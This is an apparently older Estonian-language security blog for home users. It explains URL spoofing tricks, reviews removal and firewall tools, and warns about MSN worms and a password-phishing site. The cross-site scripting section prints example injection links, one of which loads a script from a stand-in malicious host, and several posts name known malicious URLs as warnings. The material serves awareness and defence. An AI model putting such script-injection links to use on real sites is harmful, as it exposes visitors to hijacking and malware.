URL-ide võltsimine

Internetiaadressi ehk URL-i võltsimine on üha laiemalt leviv kaval võte, mille abil pahategijad suunavad arvutikasutajaid pahatahtlikele lehekülgedele, lasevad neil alla laadida viiruseid ja muud pahavara või siis varastavad paroole ja muud väärtuslikku infot.

Igale dokumendil või muul ressursil on Internetis oma unikaalne aadress, URL. Kui soovitakse pöörduda mingi veebilehe poole, siis kirjutatakse URL veebilehitseja aadressilahtrisse. URL’id sisalduvad ka veebilehtedes, kus nad kujutavad endast hüpertekstlinke teistele veebilehtedele.

Internetiaadressi esimene osa näitab ära kasutatava protokolli (näit. HTTP), sellele järgneb domeeninimi, alamkataloogi nimi ja failinimi. Veebisaidi avalehe poole pöördumiseks on vaja ainult protokolli- ja domeeninime.

Kuidas siis internetilehekülgi võltsitakse?

Esimene tehnika:

Võtame ühe lehekülje, mis näeb välja nagu Yahoo! pärislehekülje aadress (www.yahoo.com):

http://www.yahoo550.com/image/logo.jpg?queryid=77092

URL-i algus sarnaneks nagu Yahoo! omaga (yahoo500.com), kuid tegelikult ei ole sel päris-Yahooga midagi pistmist. See lehekülg võib küll paista näiteks Yahoo! ühe teenuslehekülje, http://360.yahoo.com/ sarnane, aga tegelikult ei ole see Yahoo! vallatav lehekülg.

Küll aga kuulub Yahoo!-le näiteks http://travel.yahoo.com/. Yahoo on domeen ja travel alamdomeen, mõlemit haldab päris Yahoo!

Selle võltsimistehnika puhul kasutatakse ära tavakasutajate pealiskaudsust – enamik ei ole harjunud URL-e kuigi tähelepanelikult jälgima ning neile piisab, kui nad URL-i nimes kasvõi mõne tuttava elemendi ära tunnevad.

Teine tehnika:

Veidi tähelepanelikumate ohvrite lollitamiseks asendatakse URL-i nimes üks või osa tähti sarnaste, kuid tegelikult erinevate tähtede/numbritega. Näiteks www.hot.ee võib olla ka www.ho7.ee.

Tavalised asendused on näiteks “i” -> “I”, “O” -> “0” või siis ka “1” -> “I”. Võib olla ka juhtumeid, kus teil palutakse kohe sisse logida leheküljele www.ma1l.ee, sest vastasel juhul kustutatakse teie kirjad või konto. Tekst on, nagu ikka, inglise keeles, näiteks: “Log in with your email account quickly, otherwise it will be deleted!

Kolmas tehnika:

Eriti kahtlased on näiteks e-kirja või Messengeri sõnumiga saadetud pikad ja segased URL-id, mille lõpus on .exe laiendiga fail, näiteks http://216.12.204.2/…./scfl.exe. Niisugusel juhul võib tegemist olla viirusega, mis installib end automaatselt teie arvutisse. Õnneks hoiatab vähegi turvaline brauser teid alati, kui üritate mõnd niisugust URL-i avada.

Neljas tehnika:

Võltsitud URL-le lisatakse skript, mis üritab läbi veebisirvja turvaaugu saada kontrolli arvuti üle. Kui ohver on veebilehitsejal skriptid lubanud (ja enamasti see vaikimisi nii ka on), siis võib veebilehe lähtekoodis näha midagi niisugust:

Hello message board. This is a message.

<SCRIPT>jupp pahatahtlikku koodi</SCRIPT>

This is the end of my message.

Samuti võib kohata sellist 2-st URL-st koosnevat teksti

<A href=”http://example.com/comment.cgi? mycomment=<SCRIPT src=’http://kuriveeb/pahavara’></SCRIPT>”>Vajuta siia</A>

<A href=”http://example.com/comment.cgi? mycomment=<SCRIPT>jupp pahatahtlikku koodi</SCRIPT>”> Vajuta siia</A>

Esimeses koodijupis on skriptis selgesõnaliselt endaga ühenduv kood, mis saab siis faile või juhiseid viidatud internetileheküljelt. Teises koodijupis on viite taga lihtsalt pahatahtlik kood, mida saab end käivitada läbi veebisirvija turvaaugu.

Mida skriptid teevad?

Kui kasutaja on külastanud pahatahtlike skriptidega lehekülgi, siis halvemal juhul saab ründaja ohvri arvuti üle täieliku kontroll – eriti juhul, kui surfaja kasutab vananenud ja turvaparandusteta veebisirvijat. Ründaja näeb, mis rünnatavas arvutis parasjagu toimub, milliseid lehekülgi on kasutaja külastanud enne ja pärast skriptiga pihtasaamist, ta võib uurida kasutaja salvestatud paroolide loendit ning koguni paigaldada arvutisse täiendavat pahavara. Seda kõike siis, nagu eelpool öeldud, vananenud ja turvaparandusteta brauseri ja opsüsteemi puhul – näiteks kui kasutate veebi sirvimiseks veel Internet Exploreri versiooni 6…

Kui ründajal õnnestub sisse murda veebiserverisse, siis saab ta laadida skripti üles ka serveri hallatavale koduleheküljele. Näiteks www.rooli.ee-ga oli hiljuti selline lugu.

Niimoodi saab skripti laiali saata väga suurele hulgale surfajatele ning sellega kontrollida juba väga suurt hulka arvuteid.

Kuidas liba-URL-id levivad?

Üheks peamiseks nende leviku allikaks on spämm.  Võltsitud URL-e võidakse saata ka Messengeri või Skype’i vestlusaknasse, neid võidakse istutada foorumi- ja blogipostitustesse või siis, nagu eelnevalt öeldud, kräkitud kodulehekülgedele.

Pikemalt saab URL-ide võltsimisest lugeda CA turvablogist.

RogueRemover FREE

Libatõrjujad on grupp pahavara, mis esineb kas nuhkvaraeemaldaja, viirustõrjuja või kõvakettapuhastajana, hirmutab kasutajat “leitud probleemidega” ning pakub end neid samas ka eemaldama. Ehmunud kasutaja sellega tihtilugu ka nõustub, misjärel teatatakse talle küll “probleemide” lahendamisest, kuid arvuti nakatatakse sedapuhku tõelise pahavaraga.

roque1.jpg

Lisaks libatõrjujate eemaldamisprogrammile SmitFraudFix leidsin www.wilderssecurity.com-i foorumis ringi vaadates programmi nimega RogueRemover FREE. Kuna tean paljusi juhtumeid, kus just libatõrjujad on arvuti kasutajat segama asunud, mõtlesin kohe ka seda programmi katsetada. Katsetatavat arvutit ei tulnudki kaua otsida, kuna juba täna sain ühe sellise kätte.
RogueRemover FREE saab alla laadida siit. Pärast installimist tõmmake programmile kohe uuendused – klikake Check for updates ning avanevas aknas uuesti Check for updates. Nüüd annab programm teada, et uuemat programmiversiooni ei leitud – vajutage OK. Nüüd ütleb uuendamismoodul: There is newer version of database – klikake OK ja valige nüüd Download. Oodake, kuni baas on alla laetud ja programm teatab: Database update completed. Nüüd, kui uuendus tehtud, tuleb teha asuda arvutit kontrollima.

Vajutage peamenüüst Scan ning oodake, kuni arvutit skänneeritakse. Kui midagi ei avastatud, on kõik hästi 🙂
Kui aga tulemus on nagu alloleval pildil:
roque2.jpg
vajutage Remove Selected (veenduge, et kõigil on linnukesed ees) ning peale eemaldamist tehke arvutile restart.
Minu käes olnud arvutil eemaldas see programm ilma suurema vaevata kõik need pop-upid ja karjuvad ikoonid kella juures mõne hetkega.

Veel üks Messengeri uss

Vahepeal on jalad kõhu alt välja ajanud ka vana teenus, mis lubab kindlaks teha, kes on sind oma MSN-is ära blokeerinud.
http://whoblocksyou.net/ on Järjekorde MSN-i teel reklaamitav kontokaaperdamise leht.
Olles sisestanud sellel lehel oma MSN-i kasutajanime ja parooli, muudetakse sinu ekraaninimi selliseks: http://whoblocksyou.net/ find …
Minu MSN-is olev sõber vähemasti minule seda linki ise ei saatnud, link oli ainult tema pealkirjas kajastatud.
Soovitan tungivalt hoida oma MSNi parooli enda teada ja mitte avaldada seda kolmandatele lehtedele ja isikutele.

Tulemüür GhostWall

Kas Teil on kasutusel Windows XP enda tulemüür? Kui jah, siis teadke, et olete kaitstud vaid sissetulevate ühenduste eest ning sedagi mitte väga kindlalt.

On palju häid tulemüüre, aga nende puuduseks on, et teilt küsitakse uue programmi või ühenduse puhul, kas lubate tal internetiga ühendust saada. Need hüpikaknad võivad muutuda tüütuteks või ei saa te päris hästi aru, mida nad tahavad ja kuhu tuleb vajutada.

GhostWall ei küsi, kas mingi rakendus või ühendus lubada. Programm sisaldab juba sisseehitatud reeglistikku, mis blokeerib kahtlasi ühendusi ning kontrollib arvuti välis- ja siseliiklust. Ise ei pea te mingeid reegleid  lisama ega kustutama, kui selleeks just suurt vajadust pole.

Tarkvara koormab arvutit minimaalselt. Soovitaksin seda kasutada kui alternatiivi tavalisele Windows XP tulemüürile.
Ghostwall töötab Windows XP, 2000, 2003 ja XP64 operatsioonisüsteemidega.

ghostwall.jpg
Alla laadida saab http://www.ghostsecurity.com/downloads/ghostwall_setup.exe

F-Secure BlackLight

fsbl.jpg

F-Secure BlackLight on rootkittide otsja, mis otsib teie arvutist varjatud protsesse ning vajadusel ka eemaldab need.
Programm uurib põhjalikult protsesse ja faile ning otsib pahalasi, mis maskeerivad end turvaprogrammide eest süsteemsete failide või protsessidena. F-Secure BlackLight suudab leida ja kõrvaldada aktiivseid rootkitte, mida traditsioonilised viirustõrjeprogrammid ei suuda.
Kasutamiseks ei ole vaja oma viirusetõrjet eemaldada, BlackLighti saab kasutada koos olemasoleva viirusetõrjega.
F-Secure BlackLighti saab alla laadida siit.
Ise olen aeg-ajalt erinevaid arvuteid BlackLightiga skänninud, aga siiamaani pole midagi leidnud 🙂
Olgu veel öeldud, et F-Secure Internet Security 2008 sisaldab endas BlackLighti ning seda pole vaja eraldi installida.

Jälle uus MSN-i pahalane

F-secure hoiatab, et nädalavahetusel hakkas levima uus MSN-i uss. See saadab teile MSN-is viite, näiteks sellise:
youtube.opendns.be/watchv=6QWxxxx8.youtube.com (võib muutuda). Kui seda klikkida ja pakutav programm alla tirida, nakatub ka teie arvuti ja hakkab seda linki saatma edasi kõikidele teie MSN-i kontaktidele.
Allalaetava pahavara variante on erinevaid, üks nendest, Trojan.Win32.Agent.dwd saadab linke, mille sisu võib olla nakedfamily või naked4friends ja näitab peale nakatumist näidatakse sellist pilti.
Soovitan teil tungivalt uuendada oma viirusetõrjebaase ja jälgida ka seda, kuhu te MSNis klikite ning mida avate.